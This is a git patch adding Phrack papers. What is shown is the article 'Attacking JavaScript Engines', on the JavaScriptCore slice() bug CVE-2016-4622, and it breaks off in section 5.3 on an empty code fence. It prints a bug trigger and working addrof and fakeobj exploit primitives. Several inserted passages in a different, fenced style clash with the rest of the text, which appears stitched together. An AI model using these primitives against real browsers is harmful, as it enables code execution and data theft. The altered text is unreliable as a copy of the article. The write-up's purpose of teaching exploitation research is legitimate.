From d8aeb8a5c259b90d031866fdafbf0a354260f3c2 Mon Sep 17 00:00:00 2001 From: Rui Reis Date: Fri, 28 Apr 2017 21:20:45 +0100 Subject: [PATCH] add phrack papers --- .../papers/Attacking_JavaScript_Engines.txt | 1621 +++++++++++ phrack/papers/Team_Shellphish.txt | 2409 +++++++++++++++++ phrack/papers/VM_escape.txt | 1784 ++++++++++++ 3 files changed, 5814 insertions(+) create mode 100644 phrack/papers/Attacking_JavaScript_Engines.txt create mode 100644 phrack/papers/Team_Shellphish.txt create mode 100644 phrack/papers/VM_escape.txt diff --git a/phrack/papers/Attacking_JavaScript_Engines.txt b/phrack/papers/Attacking_JavaScript_Engines.txt new file mode 100644 index 0000000..1b8324f --- /dev/null +++ b/phrack/papers/Attacking_JavaScript_Engines.txt @@ -0,0 +1,1621 @@ +|=-----------------------------------------------------------------------=| +|=---------------=[ The Art of Exploitation ]=---------------=| +|=-----------------------------------------------------------------------=| +|=------------------=[ Attacking JavaScript Engines ]=-------------------=| +|=--------=[ A case study of JavaScriptCore and CVE-2016-4622 ]=---------=| +|=-----------------------------------------------------------------------=| +|=----------------------------=[ saelo ]=--------------------------------=| +|=-----------------------=[ phrack@saelo.net ]=--------------------------=| +|=-----------------------------------------------------------------------=| + +--[ Table of contents + +0 - Introduction +1 - JavaScriptCore overview + 1.1 - Values, the VM, and (NaN-)boxing + 1.2 - Objects and arrays + 1.3 - Functions +2 - The bug + 2.1 - The vulnerable code + 2.2 - About JavaScript type conversions + 2.3 - Exploiting with valueOf + 2.4 - Reflecting on the bug +3 - The JavaScriptCore heaps + 3.1 - Garbage collector basics + 3.2 - Marked space + 3.3 - Copied space +4 - Constructing exploit primitives + 4.1 - Prerequisites: Int64 + 4.2 - addrof and fakeobj + 4.3 - Plan of exploitation +5 - 
Understanding the JSObject system + 5.1 - Property storage + 5.2 - JSObject internals + 5.3 - About structures +6 - Exploitation + 6.1 - Predicting structure IDs + 6.2 - Putting things together: faking a Float64Array + 6.3 - Executing shellcode + 6.4 - Surviving garbage collection + 6.5 - Summary +7 - Abusing the renderer process + 7.1 - WebKit process and privilege model + 7.2 - The same-origin policy + 7.3 - Stealing emails +8 - References +9 - Source code + + +--[ 0 - Introduction + +This article strives to give an introduction to the topic of JavaScript +engine exploitation using the example of a specific vulnerability. The +particular target will be JavaScriptCore, the engine inside WebKit. + +The vulnerability in question is CVE-2016-4622 and was discovered by yours +truly in early 2016, then reported as ZDI-16-485 [1]. It allows an attacker +to leak addresses as well as inject fake JavaScript objects into the +engine. Combining these primitives will result in remote code execution +inside the renderer process. The bug was fixed in 650552a. Code snippets in +this article were taken from commit 320b1fc, which was the last vulnerable +revision. The vulnerability was introduced approximately one year earlier +with commit 2fa4973. All exploit code was tested on Safari 9.1.1. + +The exploitation of said vulnerability requires knowledge of various engine +internals, which are, however, also quite interesting by themselves. As +such, various pieces that are part of a modern JavaScript engine will be +discussed along the way. We will focus on the implementation of +JavaScriptCore, but the concepts will generally be applicable to other +engines as well. + +Prior knowledge of the JavaScript language will, for the most part, not be
required. + + +--[ 1 - JavaScript engine overview + +On a high level, a JavaScript engine contains + + * a compiler infrastructure, typically including at least one + just-in-time (JIT) compiler + + * a virtual machine that operates on JavaScript values + + * a runtime that provides a set of builtin objects and functions + +We will not be concerned with the inner workings of the compiler +infrastructure too much as they are mostly irrelevant to this specific bug. +For our purposes it suffices to treat the compiler as a black box which +emits bytecode (and potentially native code in the case of a JIT compiler) +from the given source code. + + +----[ 1.1 - The VM, Values, and NaN-boxing + +The virtual machine (VM) typically contains an interpreter which can +directly execute the emitted bytecode. The VM is often implemented as a +stack-based machine (in contrast to a register-based machine) and thus +operates on a stack of values. The implementation of a specific opcode +handler might then look something like this: + + CASE(JSOP_ADD) + { + MutableHandleValue lval = REGS.stackHandleAt(-2); + MutableHandleValue rval = REGS.stackHandleAt(-1); + MutableHandleValue res = REGS.stackHandleAt(-2); + if (!AddOperation(cx, lval, rval, res)) + goto error; + REGS.sp--; + } + END_CASE(JSOP_ADD) + +Note that this example is actually taken from Firefox' Spidermonkey engine +as JavaScriptCore (from here on abbreviated as JSC) uses an interpreter +that is written in a form of assembly language and is thus not quite as +straightforward as the above example. The interested reader can however +find the implementation of JSC's low-level interpreter (llint) in +LowLevelInterpreter64.asm. + +Often the first stage JIT compiler (sometimes called the baseline JIT) takes +care of removing some of the dispatching overhead of the interpreter while +higher stage JIT compilers perform sophisticated optimizations, similar to +the ahead-of-time compilers we are used to.
Optimizing JIT compilers are +typically speculative, meaning they will perform optimizations based on +some speculation, e.g. 'this variable will always contain a number'. +Should the speculation ever turn out to be incorrect, the code will usually +bail out to one of the lower tiers. For more information about the +different execution modes the reader is referred to [2] and [3]. + +JavaScript is a dynamically typed language. As such, type information is +associated with the (runtime) values rather than (compile-time) variables. +The JavaScript type system [4] defines primitive types (number, string, +boolean, null, undefined, symbol) and objects (including arrays and +functions). In particular, there is no concept of classes in the JavaScript +language as is present in other languages. Instead, JavaScript uses what is +called "prototype-based inheritance", where each object has a (possibly +null) reference to a prototype object whose properties it incorporates. +The interested reader is referred to the JavaScript specification [5] for +more information. + +All major JavaScript engines represent a value with no more than 8 bytes +for performance reasons (fast copying, fits into a register on 64-bit +architectures). Some engines, like Google's v8, use tagged pointers to +represent values. Here the least significant bits indicate whether the +value is a pointer or some form of immediate value. JavaScriptCore (JSC) +and Spidermonkey in Firefox on the other hand use a concept called +NaN-boxing. NaN-boxing makes use of the fact that there exist multiple bit +patterns which all represent NaN, so other values can be encoded in these. +Specifically, every IEEE 754 floating point value with all exponent bits +set, but a fraction not equal to zero, represents NaN. For double precision +values [6] this leaves us with 2^51 different bit patterns (ignoring the +sign bit and setting the first fraction bit to one so nullptr can still be +represented).
That's enough to encode both 32-bit integers and pointers, +since even on 64-bit platforms only 48 bits are currently used for +addressing. + +The scheme used by JSC is nicely explained in JSCJSValue.h, which the +reader is encouraged to read. The relevant part is quoted below as it will +be important later on: + + * The top 16-bits denote the type of the encoded JSValue: + * + * Pointer { 0000:PPPP:PPPP:PPPP + * / 0001:****:****:**** + * Double { ... + * \ FFFE:****:****:**** + * Integer { FFFF:0000:IIII:IIII + * + * The scheme we have implemented encodes double precision values by + * performing a 64-bit integer addition of the value 2^48 to the number. + * After this manipulation no encoded double-precision value will begin + * with the pattern 0x0000 or 0xFFFF. Values must be decoded by + * reversing this operation before subsequent floating point operations + * may be performed. + * + * 32-bit signed integers are marked with the 16-bit tag 0xFFFF. + * + * The tag 0x0000 denotes a pointer, or another form of tagged + * immediate. Boolean, null and undefined values are represented by + * specific, invalid pointer values: + * + * False: 0x06 + * True: 0x07 + * Undefined: 0x0a + * Null: 0x02 + * + +Interestingly, 0x0 is not a valid JSValue and will lead to a crash inside +the engine. + + +----[ 1.2 - Objects and Arrays + +Objects in JavaScript are essentially collections of properties which are +stored as (key, value) pairs. Properties can be accessed either with the +dot operator (foo.bar) or through square brackets (foo['bar']). At least in +theory, values used as keys are converted to strings before performing the +lookup. + +Arrays are described by the specification as special ("exotic") objects +whose properties are also called elements if the property name can be +represented by a 32-bit integer [7]. Most engines today extend this notion +to all objects. 
An array then becomes an object with a special 'length' +property whose value is always equal to the index of the highest element +plus one. The net result of all this is that every object has both +properties, accessed through a string or symbol key, and elements, accessed +through integer indices. + +Internally, JSC stores both properties and elements in the same memory +region and stores a pointer to that region in the object itself. This +pointer points to the middle of the region, properties are stored to the +left of it (lower addresses) and elements to the right of it. There is also +a small header located just before the pointed to address that contains +the length of the element vector. This concept is called a "Butterfly" +since the values expand to the left and right, similar to the wings of a +butterfly. Presumably. In the following, we will refer to both the pointer +and the memory region as "Butterfly". In case it is not obvious from the +context, the specific meaning will be noted. + +-------------------------------------------------------- +.. | propY | propX | length | elem0 | elem1 | elem2 | .. +-------------------------------------------------------- + ^ + | + +---------------+ + | + +-------------+ + | Some Object | + +-------------+ + +Although typical, elements do not have to be stored linearly in memory. +In particular, code such as + + a = []; + a[0] = 42; + a[10000] = 42; + +will likely lead to an array stored in some kind of sparse mode, which +performs an additional mapping step from the given index to an index into +the backing storage. That way this array does not require 10001 value +slots. Besides the different array storage models, arrays can also store +their data using different representations. For example, an array of 32-bit +integers could be stored in native form to avoid the (NaN-)unboxing and +reboxing process during most operations and save some memory. 
As such, JSC +defines a set of different indexing types which can be found in +IndexingType.h. The most important ones are: + + ArrayWithInt32 = IsArray | Int32Shape; + ArrayWithDouble = IsArray | DoubleShape; + ArrayWithContiguous = IsArray | ContiguousShape; + +Here, the last type stores JSValues while the former two store their native +types. + +At this point the reader probably wonders how a property lookup is +performed in this model. We will dive into this extensively later on, but +the short version is that a special meta-object, called a "structure" in +JSC, is associated with every object and provides a mapping from property +names to slot numbers. + + +----[ 1.3 - Functions + +Functions are quite important in the JavaScript language. As such they +deserve some discussion of their own. + +When executing a function's body, two special variables become available. +One of them, 'arguments', provides access to the arguments (and caller) of +the function, thus enabling the creation of functions with a variable number +of arguments. The other, 'this', refers to different objects depending on +the invocation of the function: + + * If the function was called as a constructor (using 'new func()'), + then 'this' points to the newly created object. Its prototype has + already been set to the .prototype property of the function object, + which is set to a new object during function definition. + + * If the function was called as a method of some object (using + 'obj.func()'), then 'this' will point to the reference object. + + * Else 'this' simply points to the current global object, as it does + outside of a function as well. + +Since functions are first-class objects in JavaScript they too can have +properties. We've already seen the .prototype property above. Two other +quite interesting properties of each function (actually of the function +prototype) are the .call and .apply functions, which allow calling the +function with a given 'this' object and arguments.
This can for example be +used to implement decorator functionality: + + function decorate(func) { + return function() { + for (var i = 0; i < arguments.length; i++) { + // do something with arguments[i] + } + return func.apply(this, arguments); + }; + } + +This also has some implications for the implementation of JavaScript +functions inside the engine, as they cannot make any assumptions about the +value of the reference object which they are called with, as it can be set +to arbitrary values from script. Thus, all internal JavaScript functions +will need to check the type not only of their arguments but also of the +'this' object. + +Internally, the built-in functions and methods [8] are usually implemented +in one of two ways: as native functions in C++ or in JavaScript itself. +Let's look at a simple example of a native function in JSC: the +implementation of Math.pow(): + + EncodedJSValue JSC_HOST_CALL mathProtoFuncPow(ExecState* exec) + { + // ECMA 15.8.2.1.13 + + double arg = exec->argument(0).toNumber(exec); + double arg2 = exec->argument(1).toNumber(exec); + + return JSValue::encode(JSValue(operationMathPow(arg, arg2))); + } + +We can see: + + 1. The signature for native JavaScript functions + + 2. How arguments are extracted using the argument method (which returns + the undefined value if not enough arguments were provided) + + 3. How arguments are converted to their required type. There is a set + of conversion rules governing the conversion of e.g. arrays to + numbers which toNumber will make use of. More on these later. + + 4. How the actual operation is performed on the native data type + + 5. How the result is returned to the caller. In this case simply by + encoding the resulting native number into a value. + +There is another pattern visible here: the core implementations of various +operations (in this case operationMathPow) are moved into separate +functions so they can be called directly from JIT-compiled code.
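Since the NaN-boxing scheme from section 1.1 is central to the rest of the
article, here is a short illustration of how a double's bit pattern can be
inspected from script using only standard typed arrays (this is also the
trick the Int64 helper in section 4.1 relies on; the helper names bitsOf
and doubleOf are made up for this sketch):

```javascript
// Inspect and construct raw IEEE 754 bit patterns of doubles from script.
function bitsOf(d) {
    const buf = new ArrayBuffer(8);
    new Float64Array(buf)[0] = d;
    return new BigUint64Array(buf)[0];
}

function doubleOf(bits) {
    const buf = new ArrayBuffer(8);
    new BigUint64Array(buf)[0] = bits;
    return new Float64Array(buf)[0];
}

// 1.0 has the bit pattern 0x3ff0000000000000. Per the scheme quoted from
// JSCJSValue.h, JSC stores doubles offset by 2^48 so that no encoded
// double begins with the pattern 0x0000 or 0xFFFF.
const raw = bitsOf(1.0);              // 0x3ff0000000000000n
const jscEncoded = raw + (1n << 48n); // 0x3ff1000000000000n

// Any value with all exponent bits set and a non-zero fraction is a NaN;
// those payload bits are what leave room for boxing pointers and integers.
const boxed = doubleOf(0x7ff8000000000001n); // a NaN
```

Both views share the buffer's native byte order, so the integer read back
is exactly the double's bit pattern regardless of platform endianness.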
+ + +--[ 2 - The bug + +The bug in question lies in the implementation of Array.prototype.slice +[9]. The native function arrayProtoFuncSlice, located in +ArrayPrototype.cpp, is invoked whenever the slice method is called in +JavaScript: + + var a = [1, 2, 3, 4]; + var s = a.slice(1, 3); + // s now contains [2, 3] + +The implementation is given below with minor reformatting, some omissions +for readability, and markers for the explanation below. The full +implementation can be found online as well [10]. + + EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec) + { + /* [[ 1 ]] */ + JSObject* thisObj = exec->thisValue() + .toThis(exec, StrictMode) + .toObject(exec); + if (!thisObj) + return JSValue::encode(JSValue()); + + /* [[ 2 ]] */ + unsigned length = getLength(exec, thisObj); + if (exec->hadException()) + return JSValue::encode(jsUndefined()); + + /* [[ 3 ]] */ + unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length); + unsigned end = + argumentClampedIndexFromStartOrEnd(exec, 1, length, length); + + /* [[ 4 ]] */ + std::pair<SpeciesConstructResult, JSObject*> speciesResult = + speciesConstructArray(exec, thisObj, end - begin); + // We can only get an exception if we call some user function.
+ if (UNLIKELY(speciesResult.first == + SpeciesConstructResult::Exception)) + return JSValue::encode(jsUndefined()); + + /* [[ 5 ]] */ + if (LIKELY(speciesResult.first == SpeciesConstructResult::FastPath && + isJSArray(thisObj))) { + if (JSArray* result = + asArray(thisObj)->fastSlice(*exec, begin, end - begin)) + return JSValue::encode(result); + } + + JSObject* result; + if (speciesResult.first == SpeciesConstructResult::CreatedObject) + result = speciesResult.second; + else + result = constructEmptyArray(exec, nullptr, end - begin); + + unsigned n = 0; + for (unsigned k = begin; k < end; k++, n++) { + JSValue v = getProperty(exec, thisObj, k); + if (exec->hadException()) + return JSValue::encode(jsUndefined()); + if (v) + result->putDirectIndex(exec, n, v); + } + setLength(exec, result, n); + return JSValue::encode(result); + } + +The code essentially does the following: + + 1. Obtain the reference object for the method call (this will be the + array object) + + 2. Retrieve the length of the array + + 3. Convert the arguments (start and end index) into native integer + types and clamp them to the range [0, length) + + 4. Check if a species constructor [11] should be used + + 5. Perform the slicing + +The last step is done in one of two ways: if the array is a native array +with dense storage, 'fastSlice' will be used which just memcpy's the values +into the new array using the given index and length. If the fast path is +not possible, a simple loop is used to fetch each element and add it to the +new array. Note that, in contrast to the property accessors used on the +slow path, fastSlice does not perform any additional bounds checking... ;) + +Looking at the code, it is easy to assume that the variables 'begin' and +`end` would be smaller than the size of the array after they had been +converted to native integers. However, we can violate that assumption by +(ab)using the JavaScript type conversion rules. 
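Before looking at the conversion rules in detail, note that the callback
surface involved can be observed on any engine: slice() runs user-supplied
code while converting its arguments. On a fixed engine the call is of
course harmless; a minimal, self-contained demonstration:

```javascript
// slice() converts its arguments via ToInteger, which invokes a callable
// valueOf property -- the exact entry point the exploit hooks into.
let reached = false;
const arr = [1, 2, 3, 4];
const end = { valueOf: function() { reached = true; return 3; } };
const sub = arr.slice(1, end);
// reached === true; on a correct engine sub is [2, 3]
```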
+ + +----[ 2.2 - About JavaScript conversion rules + +JavaScript is inherently weakly typed, meaning it will happily convert +values of different types into the type that it currently requires. +Consider Math.abs(), which returns the absolute value of the argument. All +of the following are "valid" invocations, meaning they won't raise an +exception: + + Math.abs(-42); // argument is a number + // 42 + Math.abs("-42"); // argument is a string + // 42 + Math.abs([]); // argument is an empty array + // 0 + Math.abs(true); // argument is a boolean + // 1 + Math.abs({}); // argument is an object + // NaN + +In contrast, strongly-typed languages such as Python will usually raise an +exception (or, in the case of statically-typed languages, issue a compiler +error) if e.g. a string is passed to abs(). + +The conversion rules for numeric types are described in [12]. The rules +governing the conversion from object types to numbers (and primitive types +in general) are especially interesting. In particular, if the object has a +callable property named "valueOf", this method will be called and the +return value used if it is a primitive value. And thus: + + Math.abs({valueOf: function() { return -42; }}); + // 42 + + +----[ 2.3 - Exploiting with "valueOf" + +In the case of 'arrayProtoFuncSlice' the conversion to a primitive type is +performed in argumentClampedIndexFromStartOrEnd. This method also clamps +the arguments to the range [0, length): + + JSValue value = exec->argument(argument); + if (value.isUndefined()) + return undefinedValue; + + double indexDouble = value.toInteger(exec); // Conversion happens here + if (indexDouble < 0) { + indexDouble += length; + return indexDouble < 0 ? 0 : static_cast<unsigned>(indexDouble); + } + return indexDouble > length ?
length : + static_cast<unsigned>(indexDouble); + +Now, if we modify the length of the array inside a valueOf function of one +of the arguments, then the implementation of slice will continue to use the +previous length, resulting in an out-of-bounds access during the memcpy. + +Before doing this, however, we have to make sure that the element storage is +actually resized if we shrink the array. For that let's have a quick look +at the implementation of the .length setter. From JSArray::setLength: + + unsigned lengthToClear = butterfly->publicLength() - newLength; + unsigned costToAllocateNewButterfly = 64; // a heuristic. + if (lengthToClear > newLength && + lengthToClear > costToAllocateNewButterfly) { + reallocateAndShrinkButterfly(exec->vm(), newLength); + return true; + } + +This code implements a simple heuristic to avoid relocating the array too +often. To force a relocation of our array we will thus need the new size to +be much less than the old size. Resizing from e.g. 100 elements to 0 will +do the trick. + +With that, here's how we can exploit Array.prototype.slice: + + var a = []; + for (var i = 0; i < 100; i++) + a.push(i + 0.123); + + var b = a.slice(0, {valueOf: function() { a.length = 0; return 10; }}); + // b = [0.123,1.123,2.12199579146e-313,0,0,0,0,0,0,0] + +The correct output would have been an array of size 10 filled with +'undefined' values since the array has been cleared prior to the slice +operation. However, we can see some float values in the array. Seems like +we've read some stuff past the end of the array elements :) + + +----[ 2.4 - Reflecting on the bug + +This particular programming mistake is not new and has been exploited for a +while now [13, 14, 15]. The core problem here is (mutable) state that is +"cached" in a stack frame (in this case the length of the array object) in +combination with various callback mechanisms that can execute user-supplied +code further down in the call stack (in this case the "valueOf" method).
+With this setting it is quite easy to make false assumptions about the +state of the engine throughout a function. The same kind of problem +appears in the DOM as well due to the various event callbacks. + + +--[ 3 - The JavaScriptCore heaps + +At this point we've read data past our array but don't quite know what we +are accessing there. To understand this, some background knowledge about +the JSC heap allocators is required. + + +----[ 3.1 - Garbage collector basics + +JavaScript is a garbage collected language, meaning the programmer does not +need to care about memory management. Instead, the garbage collector will +collect unreachable objects from time to time. + +One approach to garbage collection is reference counting, which is used +extensively in many applications. However, as of today, all major +JavaScript engines instead use a mark and sweep algorithm. Here the +collector regularly scans all alive objects, starting from a set of root +nodes, and afterwards frees all dead objects. The root nodes are usually +pointers located on the stack as well as global objects like the 'window' +object in a web browser context. + +There are various distinctions between garbage collection systems. We will +now discuss some key properties of garbage collection systems which should +help the reader understand some of the related code. Readers familiar with +the subject are free to skip to the end of this section. + +First off, JSC uses a conservative garbage collector [16]. In essence, this +means that the GC does not keep track of the root nodes itself. Instead, +during GC it will scan the stack for any value that could be a pointer into +the heap and treats those as root nodes. In contrast, e.g. Spidermonkey +uses a precise garbage collector and thus needs to wrap all references to +heap objects on the stack inside a pointer class (Rooted<>) that takes care +of registering the object with the garbage collector. + +Next, JSC uses an incremental garbage collector. 
This kind of garbage +collector performs the marking in several steps and allows the application +to run in between, reducing GC latency. However, this requires some +additional effort to work correctly. Consider the following case: + + * the GC runs and visits some object O and all its referenced objects. + It marks them as visited and later pauses so the application can run + again. + + * O is modified and a new reference to another object P is added to it. + + * Then the GC runs again but it doesn't know about P. It finishes the + marking phase and frees the memory of P. + +To avoid this scenario, so-called write barriers are inserted into the +engine. These take care of notifying the garbage collector in such a +scenario. These barriers are implemented in JSC with the WriteBarrier<> +and CopyBarrier<> classes. + +Last, JSC uses both a moving and a non-moving garbage collector. A moving +garbage collector moves live objects to a different location and updates +all pointers to these objects. This optimizes for the case of many dead +objects since there is no runtime overhead for these: instead of adding +them to a free list, the whole memory region is simply declared free. JSC +stores the JavaScript objects themselves, together with a few other objects, +inside a non-moving heap, the marked space, while storing the butterflies +and other arrays inside a moving heap, the copied space. + + +----[ 3.2 - Marked space + +The marked space is a collection of memory blocks that keep track of the +allocated cells. In JSC, every object allocated in marked space must +inherit from the JSCell class and thus starts with an eight-byte header, +which, among other fields, contains the current cell state as used by the +GC. This field is used by the collector to keep track of the cells that it +has already visited.
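The per-cell state bookkeeping can be condensed into a toy model. This is a
deliberate simplification (a single mark pass over plain JavaScript objects,
with no incremental pauses or write barriers), not JSC's implementation:

```javascript
// Toy mark-and-sweep: each "cell" carries a state field, mirroring the
// cell state in the JSCell header described above.
function collect(roots, allCells) {
    for (const cell of allCells) cell.state = 'white'; // not yet visited
    const worklist = [...roots];
    while (worklist.length) {
        const cell = worklist.pop();
        if (cell.state === 'black') continue;          // already visited
        cell.state = 'black';                          // mark as visited
        worklist.push(...cell.refs);                   // queue children
    }
    // Sweep: everything still unvisited is unreachable, i.e. garbage.
    return allCells.filter(c => c.state === 'white');
}
```

Everything reachable from the roots ends up marked 'black'; the incremental
scheme above exists precisely because real applications mutate `refs`
between mark steps, which this one-shot model cannot capture.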
+ +There is another thing worth mentioning about the marked space: JSC stores +a MarkedBlock instance at the beginning of each marked block: + + inline MarkedBlock* MarkedBlock::blockFor(const void* p) + { + return reinterpret_cast<MarkedBlock*>( + reinterpret_cast<Bits>(p) & blockMask); + } + +This instance contains, among other things, pointers to the owning Heap +and VM instances, which allows the engine to obtain these if they are not +available in the current context. This makes it more difficult to set up +fake objects, as a valid MarkedBlock instance might be required when +performing certain operations. It is thus desirable to create fake objects +inside a valid marked block if possible. + + +----[ 3.3 - Copied space + +The copied space stores memory buffers that are associated with some object +inside the marked space. These are mostly butterflies, but the contents of +typed arrays may also be located here. As such, our out-of-bounds access +happens in this memory region. + +The copied space allocator is very simple: + + CheckedBoolean CopiedAllocator::tryAllocate(size_t bytes, void** out) + { + ASSERT(is8ByteAligned(reinterpret_cast<void*>(bytes))); + + size_t currentRemaining = m_currentRemaining; + if (bytes > currentRemaining) + return false; + currentRemaining -= bytes; + m_currentRemaining = currentRemaining; + *out = m_currentPayloadEnd - currentRemaining - bytes; + + ASSERT(is8ByteAligned(*out)); + + return true; + } + +This is essentially a bump allocator: it will simply return the next N +bytes of memory in the current block until the block is completely used. +Thus, it is almost guaranteed that two subsequent allocations will be placed +adjacent to each other in memory (the edge case being that the first fills +up the current block). + +This is good news for us. If we allocate two arrays with one element each, +then the two butterflies will be next to each other in virtually every +case.
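The bump-allocation logic above can be modelled in a few lines to make the
adjacency property explicit. A simplified sketch in JavaScript (one fixed
block, byte offsets instead of pointers, no block refill):

```javascript
// Simplified model of CopiedAllocator::tryAllocate: hand out consecutive
// offsets from a fixed-size block until it is exhausted.
class BumpAllocator {
    constructor(blockSize) {
        this.payloadEnd = blockSize; // stands in for m_currentPayloadEnd
        this.remaining = blockSize;  // stands in for m_currentRemaining
    }
    tryAllocate(bytes) {
        if (bytes % 8 !== 0) return null;          // must be 8-byte aligned
        if (bytes > this.remaining) return null;   // block exhausted
        this.remaining -= bytes;
        return this.payloadEnd - this.remaining - bytes; // start offset
    }
}
```

Two consecutive allocations of 16 and 32 bytes come back at offsets 0 and
16: back to back, which is exactly why two freshly allocated butterflies
end up adjacent in copied space.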
+ + +--[ 4 - Building exploit primitives + +While the bug in question looks like an out-of-bounds read at first, it is +actually a more powerful primitive as it lets us "inject" JSValues of our +choosing into the newly created JavaScript arrays, and thus into the +engine. + +We will now construct two exploit primitives from the given bug, allowing +us to + + 1. leak the address of an arbitrary JavaScript object and + + 2. inject a fake JavaScript object into the engine. + +We will call these primitives 'addrof' and 'fakeobj'. + + +----[ 4.1 - Prerequisites: Int64 + +As we've previously seen, our exploit primitive currently returns floating +point values instead of integers. In fact, at least in theory, all numbers +in JavaScript are 64-bit floating point numbers [17]. In reality, as +already mentioned, most engines have a dedicated 32-bit integer type for +performance reasons, but convert to floating point values when necessary +(i.e. on overflow). It is thus not possible to represent arbitrary 64-bit +integers (and in particular addresses) with primitive numbers in +JavaScript. + +As such, a helper module had to be built which allowed storing 64-bit +integer instances. It supports: + + * Initialization of Int64 instances from different argument types: + strings, numbers and byte arrays. + + * Assigning the result of addition and subtraction to an existing + instance through the assignXXX methods. Using these methods avoids + further heap allocations which might be desirable at times. + + * Creating new instances that store the result of an addition or + subtraction through the Add and Sub functions. + + * Converting between doubles, JSValues and Int64 instances such that + the underlying bit pattern stays the same. + +The last point deserves further discussion. As we've seen above, we obtain +a double whose underlying memory, interpreted as a native integer, is our +desired address.
We thus need to convert between native doubles and our +integers such that the underlying bits stay the same. asDouble() can be +thought of as running the following C code: + + double asDouble(uint64_t num) + { + return *(double*)&num; + } + +The asJSValue method further respects the NaN-boxing procedure and produces +a JSValue with the given bit pattern. The interested reader is referred to +the int64.js file inside the attached source code archive for more +details. + +With this out of the way, let us get back to building our two exploit +primitives. + + +----[ 4.2 - addrof and fakeobj + +Both primitives rely on the fact that JSC stores arrays of doubles in +native representation as opposed to the NaN-boxed representation. This +essentially allows us to write native doubles (indexing type +ArrayWithDouble) but have the engine treat them as JSValues (indexing type +ArrayWithContiguous) and vice versa. + +So, here are the steps required for exploiting the address leak: + + 1. Create an array of doubles. This will be stored internally as + IndexingType ArrayWithDouble + + 2. Set up an object with a custom valueOf function which will + + 2.1 shrink the previously created array + + 2.2 allocate a new array containing just the object whose address + we wish to know. This array will (most likely) be placed right + behind the new butterfly since it's located in copied space + + 2.3 return a value larger than the new size of the array to trigger + the bug + + 3. Call slice() on the target array with the object from step 2 as one + of the arguments + +We will now find the desired address in the form of a 64-bit floating point +value inside the array. This works because slice() preserves the indexing +type. Our new array will thus treat the data as native doubles as well, +allowing us to leak arbitrary JSValue instances, and thus pointers. + +The fakeobj primitive works essentially the other way around.
Here we +inject native doubles into an array of JSValues, allowing us to create +JSObject pointers: + + 1. Create an array of objects. This will be stored internally as + IndexingType ArrayWithContiguous + + 2. Set up an object with a custom valueOf function which will + + 2.1 shrink the previously created array + + 2.2 allocate a new array containing just a double whose bit pattern + matches the address of the JSObject we wish to inject. The + double will be stored in native form since the array's + IndexingType will be ArrayWithDouble + + 2.3 return a value larger than the new size of the array to trigger + the bug + + 3. Call slice() on the target array with the object from step 2 as one + of the arguments + +For completeness, the implementation of both primitives is printed below. + + function addrof(object) { + var a = []; + for (var i = 0; i < 100; i++) + a.push(i + 0.1337); // Array must be of type ArrayWithDouble + + var hax = {valueOf: function() { + a.length = 0; + a = [object]; + return 4; + }}; + + var b = a.slice(0, hax); + return Int64.fromDouble(b[3]); + } + + function fakeobj(addr) { + var a = []; + for (var i = 0; i < 100; i++) + a.push({}); // Array must be of type ArrayWithContiguous + + addr = addr.asDouble(); + var hax = {valueOf: function() { + a.length = 0; + a = [addr]; + return 4; + }}; + + return a.slice(0, hax)[3]; + } + + +----[ 4.3 - Plan of exploitation + +From here on our goal will be to obtain an arbitrary memory read/write +primitive through a fake JavaScript object. We are faced with the following +questions: + + Q1. What kind of object do we want to fake? + + Q2. How do we fake such an object? + + Q3. Where do we place the faked object so that we know its address? + +For a while now, JavaScript engines have supported typed arrays [18], an +efficient and highly optimizable storage for raw binary data.
+These turn out to be good candidates for our fake object as they are
+mutable (in contrast to JavaScript strings) and thus controlling their
+data pointer yields an arbitrary read/write primitive usable from script.
+Ultimately our goal will now be to fake a Float64Array instance.
+
+We will now turn to Q2 and Q3, which require another discussion of JSC
+internals, namely the JSObject system.
+
+
+--[ 5 - Understanding the JSObject system
+
+JavaScript objects are implemented in JSC by a combination of C++ classes.
+At the center lies the JSObject class which is itself a JSCell (and as
+such tracked by the garbage collector). There are various subclasses of
+JSObject that loosely resemble different JavaScript objects, such as
+Arrays (JSArray), Typed arrays (JSArrayBufferView), or Proxys (JSProxy).
+
+We will now explore the different parts that make up JSObjects inside the
+JSC engine.
+
+
+----[ 5.1 - Property storage
+
+Properties are the most important aspect of JavaScript objects. We have
+already seen how properties are stored in the engine: the butterfly. But
+that is only half the truth. Besides the butterfly, JSObjects can also
+have inline storage (6 slots by default, but subject to runtime analysis),
+located right after the object in memory. This can result in a slight
+performance gain if no butterfly ever needs to be allocated for an object.
+
+The inline storage is interesting for us since we can leak the address of
+an object, and thus know the address of its inline slots. These make a
+good candidate to place our fake object in. As an added bonus, going this
+way we also avoid any problem that might arise when placing an object
+outside of a marked block as previously discussed. This answers Q3.
+
+Let's turn to Q2 now.
+
+
+----[ 5.2 - JSObject internals
+
+We will start with an example: suppose we run the following piece of JS
+code:
+
+    obj = {'a': 0x1337, 'b': false, 'c': 13.37, 'd': [1,2,3,4]};
+
+This will result in the following object:
+
+    (lldb) x/6gx 0x10cd97c10
+    0x10cd97c10: 0x0100150000000136 0x0000000000000000
+    0x10cd97c20: 0xffff000000001337 0x0000000000000006
+    0x10cd97c30: 0x402bbd70a3d70a3d 0x000000010cdc7e10
+
+The first quadword is the JSCell. The second one is the butterfly pointer,
+which is null since all properties are stored inline. Next are the inline
+JSValue slots for the four properties: an integer, false, a double, and a
+JSObject pointer. If we were to add more properties to the object, a
+butterfly would at some point be allocated to store these.
+
+So what does a JSCell contain? JSCell.h reveals:
+
+    StructureID m_structureID;
+        This is the most interesting one, we'll explore it further below.
+
+    IndexingType m_indexingType;
+        We've already seen this before. It indicates the storage mode of
+        the object's elements.
+
+    JSType m_type;
+        Stores the type of this cell: string, symbol, function,
+        plain object, ...
+
+    TypeInfo::InlineTypeFlags m_flags;
+        Flags that aren't too important for our purposes. JSTypeInfo.h
+        contains further information.
+
+    CellState m_cellState;
+        We've also seen this before. It is used by the garbage collector
+        during collection.
+
+
+----[ 5.3 - About structures
+
+JSC creates meta-objects which describe the structure, or layout, of a
+JavaScript object. These objects represent mappings from property names to
+indices into the inline storage or the butterfly (both are treated as
+JSValue arrays). In its most basic form, such a structure could be an
+array of (property name, slot index) pairs. It could also be implemented
+as a linked list or a hash map. Instead of storing a pointer to this
+structure in every JSCell instance, the developers instead decided to
+store a 32-bit index into a structure table to save some space for the
+other fields.
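To make the idea concrete, the property-name-to-slot-index mapping described above can be modeled in a few lines of JavaScript. This is purely a conceptual sketch of what a structure represents, not engine code, and the names are made up:

```javascript
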